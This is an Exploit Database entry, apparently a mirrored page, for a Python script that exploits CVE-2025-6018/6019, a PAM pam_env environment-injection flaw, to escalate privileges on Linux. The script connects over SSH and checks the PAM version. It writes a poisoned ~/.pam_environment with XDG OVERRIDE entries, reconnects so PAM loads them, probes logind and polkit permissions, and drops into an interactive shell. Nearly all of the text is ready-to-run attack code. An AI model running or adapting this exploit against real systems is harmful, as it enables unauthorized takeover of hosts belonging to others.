Linux PAM Environment – Variable Injection Local Privilege Escalation

Exploit Database
8 阅读

作者： İbrahimsql

日期： 2025-07-28
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/52386/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

# Exploit Title: Linux PAM Environment - Variable Injection Local Privilege Escalation

# Exploit Author: @İbrahimsql

# Exploit Author's github: https://github.com/ibrahmsql

# Description: PAM pam_env.so module allows environment variable injection via ~/.pam_environment

#leading to privilege escalation through SystemD session manipulation

# CVE: CVE-2025-6018, CVE-2025-6019

# Vendor Homepage: https://github.com/linux-pam/linux-pam

# Software Link: https://github.com/linux-pam/linux-pam/releases

# Version: PAM 1.3.0 - 1.6.0 (vulnerable versions)

# Category: Local Privilege Escalation

# Requirements: paramiko>=2.12.0

# Usage: python3 cve_2025_6018_professional.py -i target_ip -u username -p password

# References:

# - https://access.redhat.com/security/cve/CVE-2025-6018

# - https://bugzilla.redhat.com/show_bug.cgi?id=2372693

# - https://bugzilla.suse.com/show_bug.cgi?id=1243226

import paramiko

import time

import sys

import socket

import argparse

import logging

from datetime import datetime

# Setup logging

logging.basicConfig(

level=logging.INFO,

format='%(asctime)s [%(levelname)s] %(message)s',

datefmt='%Y-%m-%d %H:%M:%S',

handlers=[

logging.FileHandler('cve_2025_6018_exploit.log'),

logging.StreamHandler(sys.stdout)

]

)

logger = logging.getLogger(__name__)

class CVEExploit:

def __init__(self):

self.vulnerable_versions = [

"pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0",

"pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0"

]

def check_vulnerability(self, client):

"""Enhanced vulnerability detection"""

logger.info("Starting vulnerability assessment")

checks = {

"pam_version": "rpm -q pam || dpkg -l | grep libpam",

"pam_env": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null",

"pam_systemd": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null",

"systemd_version": "systemctl --version | head -1"

}

vulnerable = False

for check_name, command in checks.items():

logger.info(f"Executing check: {check_name}")

try:

stdin, stdout, stderr = client.exec_command(command, timeout=10)

output = stdout.read().decode().strip()

if check_name == "pam_version":

for vuln_ver in self.vulnerable_versions:

if vuln_ver in output:

logger.info(f"Vulnerable PAM version detected: {vuln_ver}")

vulnerable = True

break

elif check_name == "pam_env" and output:

logger.info("pam_env.so configuration found")

vulnerable = True

elif check_name == "pam_systemd" and output:

logger.info("pam_systemd.so found - escalation vector available")

if output and check_name != "pam_version":

logger.debug(f"Command output: {output[:100]}...")

except Exception as e:

logger.warning(f"Check {check_name} failed: {e}")

time.sleep(0.5)

return vulnerable

def create_malicious_environment(self, client):

"""Create enhanced .pam_environment file"""

logger.info("Creating malicious environment file")

payload = '''# CVE-2025-6018 Environment Poisoning

XDG_SEAT OVERRIDE=seat0

XDG_VTNR OVERRIDE=1

XDG_SESSION_TYPE OVERRIDE=x11

XDG_SESSION_CLASS OVERRIDE=user

XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime

SYSTEMD_LOG_LEVEL OVERRIDE=debug'''

try:

logger.info("Writing .pam_environment file")

cmd = f"cat > ~/.pam_environment << 'EOF'\n{payload}\nEOF"

stdin, stdout, stderr = client.exec_command(cmd)

# Verify creation

stdin, stdout, stderr = client.exec_command("cat ~/.pam_environment")

output = stdout.read().decode()

if "OVERRIDE" in output:

logger.info("Malicious environment file created successfully")

return True

else:

logger.error("Failed to create environment file")

return False

except Exception as e:

logger.error(f"Environment poisoning failed: {e}")

return False

def test_privilege_escalation(self, client):

"""Test privilege escalation vectors"""

logger.info("Testing privilege escalation vectors")

tests = [

("SystemD Reboot", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot", "yes"),

("SystemD Shutdown", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanPowerOff", "yes"),

("PolicyKit Check", "pkcheck --action-id org.freedesktop.policykit.exec --process $$ 2>/dev/null || echo 'denied'", "authorized")

]

escalated = False

for test_name, command, success_indicator in tests:

logger.info(f"Testing: {test_name}")

try:

stdin, stdout, stderr = client.exec_command(command, timeout=10)

output = stdout.read().decode().strip()

if success_indicator in output.lower():

logger.info(f"PRIVILEGE ESCALATION DETECTED: {test_name}")

escalated = True

else:

logger.info(f"No escalation detected: {test_name}")

except Exception as e:

logger.warning(f"Test {test_name} failed: {e}")

return escalated

def interactive_shell(self, client):

"""Professional interactive shell"""

logger.info("Starting interactive shell session")

shell = client.invoke_shell()

shell.send("export PS1='exploit$ '\n")

time.sleep(1)

# Clear buffer

while shell.recv_ready():

shell.recv(1024)

print("\n--- Interactive Shell ---")

print("Commands: 'exit' to quit, 'status' for privilege check")

while True:

try:

command = input("exploit$ ")

if command.lower() == 'exit':

break

elif command.lower() == 'status':

stdin, stdout, stderr = client.exec_command("id && groups")

print(stdout.read().decode())

continue

shell.send(command + "\n")

time.sleep(0.5)

while shell.recv_ready():

output = shell.recv(1024).decode('utf-8', errors='ignore')

print(output, end='')

except KeyboardInterrupt:

logger.warning("Use 'exit' to quit properly")

except Exception as e:

logger.error(f"Shell error: {e}")

break

def run_exploit(self, hostname, username, password=None, key_filename=None, port=22):

"""Main exploit execution"""

logger.info(f"Starting CVE-2025-6018 exploit against {hostname}:{port}")

try:

# Initial connection

client = paramiko.SSHClient()

client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

logger.info(f"Connecting to {hostname}:{port} as {username}")

client.connect(hostname, port=port, username=username,

password=password, key_filename=key_filename, timeout=10)

logger.info("SSH connection established")

# Check vulnerability

if not self.check_vulnerability(client):

logger.error("Target does not appear vulnerable to CVE-2025-6018/6019")

return False

logger.info("Target appears vulnerable, proceeding with exploitation")

# Create malicious environment

if not self.create_malicious_environment(client):

logger.error("Failed to create malicious environment")

return False

logger.info("Reconnecting to trigger PAM environment loading")

client.close()

time.sleep(2)

# Reconnect to trigger PAM

client = paramiko.SSHClient()

client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

client.connect(hostname, port=port, username=username,

password=password, key_filename=key_filename)

logger.info("Reconnection successful")

# Test privilege escalation

if self.test_privilege_escalation(client):

logger.info("EXPLOITATION SUCCESSFUL - Privilege escalation confirmed")

self.interactive_shell(client)

else:

logger.warning("No clear privilege escalation detected")

logger.info("Manual verification may be required")

return True

except paramiko.AuthenticationException:

logger.error("Authentication failed - check credentials")

except paramiko.SSHException as e:

logger.error(f"SSH error: {e}")

except socket.error as e:

logger.error(f"Network error: {e}")

except Exception as e:

logger.error(f"Unexpected error: {e}")

finally:

try:

client.close()

except:

pass

logger.info("Connection closed")

return False

def main():

parser = argparse.ArgumentParser(

description="CVE-2025-6018/6019 PAM Environment Injection Exploit",

formatter_class=argparse.RawDescriptionHelpFormatter,

epilog="""

Examples:

python3 %(prog)s -i 192.168.1.100 -u testuser -p password123

python3 %(prog)s -i target.com -u admin -k ~/.ssh/id_rsa

"""

)

parser.add_argument("-i", "--hostname", required=True, help="Target hostname or IP")

parser.add_argument("-u", "--username", required=True, help="SSH username")

parser.add_argument("-p", "--password", help="SSH password")

parser.add_argument("-k", "--key", dest="key_filename", help="SSH private key file")

parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)")

parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")

args = parser.parse_args()

if args.verbose:

logging.getLogger().setLevel(logging.DEBUG)

if not args.password and not args.key_filename:

parser.error("Provide either password (-p) or private key (-k)")

# Security warning

logger.warning("Use only with proper authorization!")

exploit = CVEExploit()

success = exploit.run_exploit(

hostname=args.hostname,

username=args.username,

password=args.password,

key_filename=args.key_filename,

port=args.port

)

sys.exit(0 if success else 1)

if __name__ == "__main__":

main()